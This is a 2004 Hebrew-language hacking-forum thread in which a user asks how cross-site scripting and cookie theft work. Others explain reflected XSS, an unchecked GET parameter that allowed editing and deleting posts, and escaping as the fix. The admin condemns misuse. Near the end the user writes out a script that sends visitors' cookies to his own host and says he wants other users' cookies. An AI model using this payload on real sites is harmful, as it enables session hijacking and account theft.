2004-07-15 22:30
zerocool
טוב אני צריך הסבר מזה בדיוק XSS ואיך זה עובד בדיוק ממה שאני הבנתי XSS זה בעצם כמו COOKIES THIEFT זה בעצם JAVA SCRIPT שאתה יכול להזריק עם XSS פקודות ואז זה שולח הודעה לבן אדם נגיד אתה עושה XSS ל NEWS.PHP אז מי שנכנס להודעה הזאת אתה יכול לגנוב את הקוקי שלו זה ממה שאני הבנתי אני דיי חושב שלא הבנתי נכון אז תקנו אותי ועוד משהו אחרי שאתה מזריק פקודת XSS מה אני צריך לראות בשביל לדעת אם זה יצליח??
2004-07-15 23:17
cp77fk4r
לא ממש.. Xss זה "קיצור" של Cross side scripting, כתבתי "קיצור" בגרשיים בגלל שזה באמת Css, אבל כבר יש דבר כזה, אז כדי שלא יתבלבלו כותבים את זה עם "X" ולא עם "C" (ת'אמת? יש גם דבר כזה Xss, שזה Xyloc Security Server אבל ממש חפיף..)
בכל אופן, Xss זה להחזיר קוד HTML בטפסים ש(לרב) מאמתים נתונים מסויימים ולצנל את עם העובדה שהם לא נכתבו מספיק טוב, המקומות שאני הכי ראיתי להם שימוש זה יותר בטפסים ששולחים מידע בצורת Get, ככה גם הרבה יות רקל לעקוב אחרי כל דבר ודבר.
יש כמובן את הבאג המוכר בפורומים Webwiz שככה פרצו לRed-board והורידו את המערכת השחורה (אם אני זוכר טוב).
כשאתה מזריק את המידע, אז זה לא שכל מי שנכנס לאותו טופס מקבל את מה שאתה כתבת, זה פשוט שאתה היחידי שמושפע מצורת ההתנהגות החדשה של הטופס, כי רק אתה הכנסת את הקלט המסויים.
למשל, פעם, בפורומים של Zombit, היה אפשר לערוך או למחוק כל הודעה והודעה ע"י שינוי אערך "View" ל"Edit" בשורת פקודה, איך? פשוט מאוד, הבקשה לצפיה (View) הייתה נשלחת עם כל הפרטים בצורת Get, ככה שהייתה יכול לראות איזה מידע בדיוק הטופס שולח למערכת, הייתה רואה שהוא שולח למשל בקשה: "Act="View"&Massage="100 (זה לא היה ככה בדיוק, אני כותב את זה מהזכרון). אז היית יכול לשנות את הAct ל"Edit", ושפוט היית מגיע לעמוד שעורך את הודעה ההודעה, היית משנה את הAct ל"Delete" או שזה היה "Del" אז היית מגיע לעמוד של המחיקת הודעה.
מה שהם עשו פה, זה שכל משתמש ומשתמש יכול לערוך או למחוק כל הודעה שהוא רוצה (יש לו את הגישה לזה), אבל פשוט בממשק של המשתמש הרגיל אין את הכפתורים "מחק" ו"ערוך", ורק בממשק של המנהל יש את הכפתורים האלה, אבל בגלל שהם לא אימתו באמת את המידע וחשבו שבלי הכפתורים לא יהיה אפשרי להגיע לעמודים האלה הם טעו, ואנשים פשוט אנסו להם את הפורום...
2004-07-15 23:54
zerocool
סבבה אחי אבל מה קורה שהצלחתי נגיד להזריק XSS מה אני יכול לעשות עם זה?? ומה אני צריך לראות בשביל לדעת אם זה הצליח נגיד http://f00bar.com/modules.php?name=News&file=friend&op=StorySent&title=%253cscript>alert%2528document.cookie);%253c/script>
מזה עושה בעצם??
2004-07-16 01:38
cp77fk4r
הקוד אמור להציג לך את הקוקי שאתה מקבל אחרי שאתה ממלא את הטופס שהמודול שלו הוא Nama=News וFile=Friend ו-Op=StorySent והtitle זה מה שאתה מנסה להציג (בקוקיז..)
2004-07-16 01:39
zerocool
סבבה אחי אבל מזה /modules.php?name=News&file=friend&op=StorySent&title=%253cscript>alert%2528document.cookie);%253c/script>
כאילו אני מתכוון מזה עושה בעצם הבנתי שזה גונב את הקוקי אבל איך
מה ה "HACKER" יכול לראות עם /modules.php?name=News&file=friend&op=StorySent&title=%253cscript>alert%2528document.cookie);%253c/script>
ואיך בדיוק הוא רואה עם זה משהו??
2004-07-16 01:52
Admin
XSS זה כמובן שימוש בקוד HTML בעמוד דינאמי, כאשר קוד HTML יכול לכלול בתוכו גם קוד Java Script (כמו במקרה של הכתובת שנתת). ככה שבמידה ויש פירצת XSS במקום כלשהו, יש לך אפשרות להשתיל סקריפט באתר, אותו אתה מעצב למטרותך.
אני מניח שהכתובת שנתת מובילה לשליחת נתונים למסד נתונים, כאשר כנראה יש אפשרות ל-XSS במשתנה title. במידה והנתונים שנשלחים למסד הנתונים, בעצם מובילים למשהו בסיגנון פתיחת נושא חדש בפורום, בנושא הפורום יכתב תוכן העוגייה של הקורא. כמובן שהסקריפט בכתובת זו, לא שימושי מעבר ל"הפחדת" המשתמשים שרואים את תוכן העוגייה שלהם אבל אפשר לפתח אותו כפי שציינתי בפיסקה הקודמת, ככה שהוא ישלח לכתובת דוא"ל מסויימת את תוכן העוגייה של הקורא, ככה ש"הפורץ" יוכל "לגנוב" את פרטי ההתחברות של המשתמשים (שם משתמש, סיסמה, דוא"ל או כל דבר אחר שרשומים בעוגייה).
ניתן לדעת אם פירצת XSS קיימת במקום כלשהו כאשר אתה שולח נתונים עם קוד HTML ורואה שהם עובדים ולא מוצגים כקוד רגיל במערכת. למשל לשלוח alert בג'אווה סקריפט ולראות אם הוא קופץ או לא (כמובן לבדוק קודם שאישרת שימוש בג'אווה סקריפט בדפדפן שלך).
כדי למנוע XSS, יש לקבוע שמספר תווים יכתבו כ-Entity, Decimal או Hex, בניהם > < ' ; רשימת תווים וקודי ה-Decimal, Entity, Hex שלהם, תוכל למצוא כאן.[נערך על-ידי Admin בתאריך 2004/07/16 02:00]
2004-07-16 02:11
cp77fk4r
לא.. איך שאתה כתבת את זה הוא לא יראה, אין לי מושג מאיפה הבאת את זה, באתר הזה אין בכלל "modules.php"...
והאקר לא גונב (עם הקוד הזה) את הקוקיז, הקוד פשוט מציג את הקוקיז שמגיע אליו מהשרת במילוי הטופס..
2004-07-16 02:30
Admin
מה פתאום, כדי שהקוד יציג את העוגייה של שולח הנתונים יש צורך בקוד של שפת צד שרת (ASP PHP CGI וכו'. בסקריפט הקוד נשאר כמו שהוא, ככה שבעת שליחת הנתונים למסד הנתונים, נשלח הקוד ולא התוצאה שלו, ככה שבמקרה הזה הוא ישתנה בהתאם למשתמש שצופה בעמוד (בנושא) עם הקוד, ולא ישאר קבוע בהתאם לעוגייה של שולח הנתונים.[נערך על-ידי Admin בתאריך 2004/07/16 02:37]
2004-07-16 03:29
zerocool
חחח מה הולך פה :)?? אני בעצמי כבר משתגע אני יביא לכם אתר ותסבירו לי בדיוק איך זה עובד אבל רק אם בא לכם לעזור לי קצתת http://securitytracker.com/alerts/2002/Mar/1003781.html
תודה ZEROCOOL
2004-07-16 04:06
cp77fk4r
אתה מבלבל בין שני נושאים, כנס לפה, תקרא ותגיד לי אם זה הנושא שדיברת עליו. http://tankz.zext.net/binaryvision/index.php?title=Cookie%20Hack&page=modules/articles/display.php&cat=Security&file=Cookie%20Hack&right=modules/articles
2004-07-16 06:39
zerocool
לא יודע אחי אבל לפי מה שראיתי זה אותו הדבר הנושא שהבאת לי ובאתר שהבאתי לך כתוב
CROSS SITE SCRIPTING אז למה התבלבלתי:(?
2004-07-16 06:46
silicon_wolf
יש לנו ערוץ אבטחת מידע
irc.israel.net #rb-security
אתה מוזמן לבוא ולשאול שם (:
2004-07-16 11:17
Admin
אין פה שום בלבול בין נושאים.. zerocool מדבר על XSS שזה האפשרות להשתמש ב-HTML בעמודים דינאמים, ותוך כדי הוא מבקש הסבר על כתובת שהוא נתן בה מוצגת אחת הדרכים לניצול הפירצה, כאשר התצוגה היא באמצעות סקריפט לא מזיק.
cp77fk4t: שים לב שבמדריך שכתבת, כתוב השימוש בסקריפט: <script>alert(document.cookie);</script> "כרגע זה לא עוזר לנו הרבה, כי כך כל אחד רואה את הקוקי שלו ואת שלו בלבד, ובכך לא הגענו לשום מקום."
2004-07-16 12:15
cp77fk4r
שחף, לא אני כתבתי את המדריך הזה, המדריך הזה נכתב ע"י BoyBear.
וzerocool, אתה בהתחלה דיברת על להזריק מידע מסויים שישנה את הקוד של הטופס...
2004-07-16 12:31
Admin
כשאמרתי "שבמדריך שכתבת" בתגובה האחרונה שלי, לא התכוונתי שאתה כתבת את המדריך, אלא התכוונתי "למדריך שכתבת\נתת\הבאת בהודעה האחרונה שלך".
ואני מאמין שמההתחלה הוא דיבר על אותו נושא, פשוט המילה "להזריק" לא מתאימה בנושא הזה והוא בכל-זאת בחר להשתמש בה בניסוח שלו. הטעות היחידה שלו הייתה שהוא קבע ש-XSS זה פחות או יותר רק לגניבת עוגיות, כשבעצם הכוונה היא לשלב קוד HTML בעמוד דינאמי.
2004-07-18 02:07
cp77fk4r
תחפש איזה שרת, יש רשימה של שרתים בחדר "בנית אתרים", זאת שאלה שמתאימה לשם.
2004-07-18 01:23
zerocool
ברור אחי רק למטרות טובות אני לא איזה מניאק שיהרוס אתר ודרך אגב הבנתי אחי את הקטע
אתה צריך לשים את הפקודה הזאת בשביל לגנוב את הקוקי שלו <script> window.open("http://somehost.com/folder/vdump.php?dump=" + document.cookie); </script>
וצריך לשמור קובץ ריק גם באתר varsdump.txt שבעצם ה somehost זה האתר שלך וזה פשוט ישלח את הקוקי לאתר שלך עם דישה מלאה עליו (CHMOD 777).
ואז זה ישלח את ה cookie לקובץ
עכשיו הבעיה היחידה איזה אתרים יש שאני יכול לבנות את האתר שלי שתומך ב php scripts
2004-07-17 23:33
Admin
דברנו בנושא על השימוש ב-XSS, והדרך לתקן את הפירצה, ומכאן כבר תפתח לבד את הנושא. בכל-מקרה, שים לב למדריך ש-cp77fk4r הביא באחת התגובות הקודמות: http://tankz.zext.net/binaryvision/index.php?title=Cookie%20Hack&page=modules/articles/display.php&cat=Security&file=Cookie%20Hack&right=modules/articles
אני רק חושב שמן הראוי לציין שאני מוקיע את השימוש ב-XSS על-מנת לגנוב עוגיות של משתמשים אחרים, ובכלל כדי לפגוע באחרים. כל התגובות שלי בנושא זה הן למטרות ידע בלבד, בתקווה שאין לך עניין להרוס לאחרים אלא לעזור, ככה שבמקום לנצל את הפירצה לגניבת עוגיות של משתמשים, אני מקווה שתנצל אותה כדי להודיע לבעלי אתרים על קיומה, ולכן גם הוספתי בתגובה הראשונה שלי לנושא מידע על איך לטפל בפירצה.
2004-07-17 01:02
zerocool
אחי לא קבעתי שזה גניבת הודעות אני יודע ש XSS יכול לעשות הרבה דברים חוץ מגניבת עוגיות התכוונתי לזה איך אני יכול לנצל את <script>alert(document.cookie);</script> בשביל לגנוב הודעות מאחרים גם שאני רושם http://f00bar.com/modules.php?name=News&file=friend&op=StorySent&title=%253cscript>alert%2528document.cookie);%253c/script>
אז זה בעצם מראה לי רק את הקוקי שלי וזה לא יעיל לי אני רוצה שזה יראה לי את הקוקי של המשתמשים אז הבעיה שלי איך אני לעשות את זה מה הפקודה בדיוק שזה יגנוב את הקוקי של המשתמשים
2004-08-03 19:07
עפרים
האדמין מבין יש למלא סקס באתר הזה
עמודים:
1
